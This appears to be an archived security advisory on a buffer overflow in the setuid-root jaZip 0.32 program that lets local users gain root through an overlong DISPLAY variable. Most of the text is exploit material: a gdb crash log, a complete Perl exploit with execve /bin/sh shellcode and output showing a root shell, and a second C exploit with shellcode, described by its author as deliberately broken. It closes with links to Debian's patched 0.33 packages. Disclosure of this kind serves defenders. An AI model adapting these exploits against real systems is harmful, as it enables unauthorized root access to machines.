|
Vulnerability jaZip Affected jaZip Description teleh0r found following. jaZip is a program for managing an Iomega Zip or Jaz drive. It is often installed setuid root - and because of a buffer overflow it is possible for regular users to become root. Tested rpm: ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm Let's see: [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'` [root@localhost /root]# gdb /usr/X11R6/bin/jazip GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. (gdb) r Starting program: /usr/X11R6/bin/jazip Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () ---- [teleh0r@localhost teleh0r]$ rpm -q jaZip jaZip-0.32-2 [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl Address: 0xbffff7ac bash# Exploit follows: #!/usr/bin/perl ## jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000 ## teleh0r@doglover.com / http://teleh0r.cjb.net/ $shellcode = # Shellcode by: Taeho Oh "\xeb\x1f". #/* jmp 0x1f */ "\x5e". #/* popl %esi */ "\x89\x76\x08". #/* movl %esi,0x8(%esi) */ "\x31\xc0". #/* xorl %eax,%eax */ "\x88\x46\x07". #/* movb %eax,0x7(%esi) */ "\x89\x46\x0c". #/* movl %eax,0xc(%esi) */ "\xb0\x0b". #/* movb $0xb,%al */ "\x89\xf3". #/* movl %esi,%ebx */ "\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */ "\xcd\x80". #/* int $0x80 */ "\x31\xdb". #/* xorl %ebx,%ebx */ "\x89\xd8". #/* movl %ebx,%eax */ "\x40". #/* inc %eax */ "\xcd\x80". #/* int $0x80 */ "\xe8\xdc\xff\xff\xff". #/* call -0x24 */ "/bin/sh"; #/* .string \"/bin/sh\" */ $ret = 0xbffff7ac; # May have to be modified. $len = 2100; $nop = 'A'; if (@ARGV == 1) { $offset = $ARGV[0]; } for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { $buffer .= $nop; } $buffer .= $shellcode; print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n"); $new_ret = pack('l',($ret + $offset)); $buffer .= $nop x 3; # May have to be modified. for ($i += length($shellcode); $i < $len; $i += 4) { $buffer .= $new_ret; } if ($ENV{'DISPLAY'}) { delete($ENV{'DISPLAY'}); } local($ENV{'DISPLAY'}) = $buffer; exec("/usr/X11R6/bin/jazip"); Here is another exploit: /* * jaZip-0.32 local buffer overflow exploit (tested on debian) * * usage is: ./jazip-exp <offset> <align> * offset: 1500 x N (where N is positive or negative number) * align: 1-3 (0 is def.) * * This exploit is heavily broken, to prevent scriptkiddie abuse! * Thanks to d-blood for helping me with the shellcode. * * c0ded by: needler @ efnet <n33dl3r@hotmail.com> * * Oh btw.. fuck college, I'm gonna be a pro CS player. */ #include <stdio.h> #include <stdlib.h> #define BSIZE 2080 #define NOPS 1500 char shellcode[] = "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; int main(int argc, char **argv, char **envp) { char overflow[BSIZE]; int i, align = 0, offset = 0; u_long addy = 0xbffff9e5; if( argc > 1) offset = atoi(argv[1]); if( argc > 2) align = atoi(argv[2]); memset(overflow, 0x90, BSIZE); memcpy(&overflow[NOPS], shellcode, strlen(shellcode)); memcpy(overflow, "DISPLAY=", 8); for( i = (NOPS + strlen(shellcode)); i < BSIZE; i += 4) *(long *)&overflow[i+align] = addy + offset; envp[0] = overflow; printf("Using address 0x%x\n", addy + offset); // execl("/usr/X11R6/bin/jazip", "jazip", NULL); } Solution For Debian Linux: http://security.debian.org/dists/stable/updates/main/source/jazip_0.33-1.dsc http://security.debian.org/dists/stable/updates/main/source/jazip_0.33-1.diff.gz http://security.debian.org/dists/stable/updates/main/source/jazip_0.33.orig.tar.gz http://security.debian.org/dists/stable/updates/main/binary-i386/jazip_0.33-1_i386.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/jazip_0.33-1_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/jazip_0.33-1_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/jazip_0.33-1_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/jazip_0.33-1_powerpc.deb Author of package provided fixed version 0.33.